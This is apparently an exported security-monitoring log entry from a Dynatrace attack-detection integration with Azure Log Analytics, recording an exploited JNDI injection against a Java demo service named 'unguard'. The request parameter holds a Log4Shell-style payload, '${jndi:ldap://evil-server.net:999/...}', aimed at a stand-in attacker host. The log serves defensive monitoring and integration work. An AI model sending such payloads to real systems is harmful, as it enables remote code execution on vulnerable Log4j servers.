4.4 KiB
TenantId | SourceSystem | MG | ManagementGroupName | TimeGenerated [UTC] | Computer | RawData | entrypoint_codeLocation_displayName_s | entrypoint_codeLocation_className_s | entrypoint_codeLocation_functionName_s | entrypoint_codeLocation_parameterTypes_values_s | entrypoint_codeLocation_parameterTypes_truncationInfo_truncated_b | entrypoint_codeLocation_returnType_s | entrypoint_codeLocation_lineNumber_d | attackId_s | displayId_s | timestamp_d | displayName_s | attackType_s | technology_s | state_s | request_url_s | request_path_s | request_protocolDetails_http_requestMethod_s | request_protocolDetails_http_headers_values_s | request_protocolDetails_http_headers_truncationInfo_s | request_protocolDetails_http_parameters_values_s | request_protocolDetails_http_parameters_truncationInfo_s | entrypoint_entrypointFunction_displayName_s | entrypoint_entrypointFunction_className_s | entrypoint_entrypointFunction_functionName_s | entrypoint_entrypointFunction_parameterTypes_values_s | entrypoint_entrypointFunction_parameterTypes_truncationInfo_truncated_b | entrypoint_entrypointFunction_returnType_s | entrypoint_payload_values_s | entrypoint_payload_truncationInfo_truncated_b | vulnerability_vulnerabilityId_s | vulnerability_displayName_s | vulnerability_codeLocation_displayName_s | vulnerability_codeLocation_className_s | vulnerability_codeLocation_functionName_s | vulnerability_codeLocation_parameterTypes_values_s | vulnerability_codeLocation_parameterTypes_truncationInfo_truncated_b | vulnerability_codeLocation_returnType_s | vulnerability_codeLocation_lineNumber_d | vulnerability_vulnerableFunction_displayName_s | vulnerability_vulnerableFunction_className_s | vulnerability_vulnerableFunction_functionName_s | vulnerability_vulnerableFunction_parameterTypes_values_s | vulnerability_vulnerableFunction_parameterTypes_truncationInfo_truncated_b | vulnerability_vulnerableFunction_returnType_s | vulnerability_vulnerableFunctionInput_type_s | vulnerability_vulnerableFunctionInput_inputSegments_s | attacker_sourceIp_s | attacker_location_countryCode_s | attacker_location_country_s | attacker_location_city_s | managementZones_s | Type | _ResourceId |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---
0466271e-77e0-47ef-bc01-ee8177ca53ee | OpsManager | | | 27/10/2023, 11:17:35.044 | | | | | | | | | | 1698405124415_02195243643866821550 | A-22DAIC | 1698405124415 | javax.servlet.ServletRequestWrapper.getParameterValues() | JNDI_INJECTION | JAVA | EXPLOITED | / | / | GET | [{"name":"x-client-ip","value":"192.168.1.1"},{"name":"user-agent","value":"axios/0.20.0"},{"name":"host","value":"unguard-proxy-service"},{"name":"accept","value":"application/json, text/plain, */*"},{"name":"x-dynatrace","value":"FW4;-1743916453;7;-359533746;498416;2;-860574453;372;d30e;2h02;3h87179aa2;4h0f4988;5h01;6heed8e7bffd3835c46961d6ded2ae3e75;7h59eb10f60139ab11"},{"name":"traceparent","value":"00-eed8e7bffd3835c46961d6ded2ae3e75-59eb10f60139ab11-01"},{"name":"tracestate","value":"ccb4ad0b-980df25b@dt=fw4;7;ea91f34e;79af0;2;0;0;174;a886;2h02;3h87179aa2;4h0f4988;5h01;7h59eb10f60139ab11"},{"name":"connection","value":"close"}] | {"truncated":false} | [] | {"truncated":true} | ServletRequestWrapper.getParameterValues(String) | javax.servlet.ServletRequestWrapper | getParameterValues | ["String"] | false | java.lang.String[] | [{"type":"HTTP_PARAMETER_VALUE","name":"url","value":"${jndi:ldap://evil-server.net:999/CompromiseMachine}"}] | false | -7037978146758609592 | JndiManager.lookup():128 | org.apache.logging.log4j.core.net.JndiManager.lookup(String):128 | org.apache.logging.log4j.core.net.JndiManager | lookup | ["String"] | false | java.lang.Object | 128 | InitialContext.lookup(String) | javax.naming.InitialContext | lookup | ["String"] | false | java.lang.Object | JNDI | [{"value":"ldap://evil-server.net:999/CompromiseMachine","type":"MALICIOUS_INPUT"}] | 192.168.1.1 | DE | Germany | Rottenburg | [{"id":"2843874372046580667","name":"Dev2Dev Demo 2"},{"id":"2631544906797876001","name":"Infrastructure Linux (incl PG)"},{"id":"5996194749094481086","name":"XXXXX-TestZone"},{"id":"1674365597043557983","name":"XXXX Test"},{"id":"8696294048462936180","name":"excemptions test"},{"id":"8097065485878182312","name":"java"},{"id":"-8367998469205081223","name":"pgTestMz"},{"id":"-2661345213750943630","name":"XXXXX-java-MZ"},{"id":"-432603006836851299","name":"XXXX-mz"},{"id":"5322819311624991300","name":"unguard"}] | DynatraceAttacks_CL | |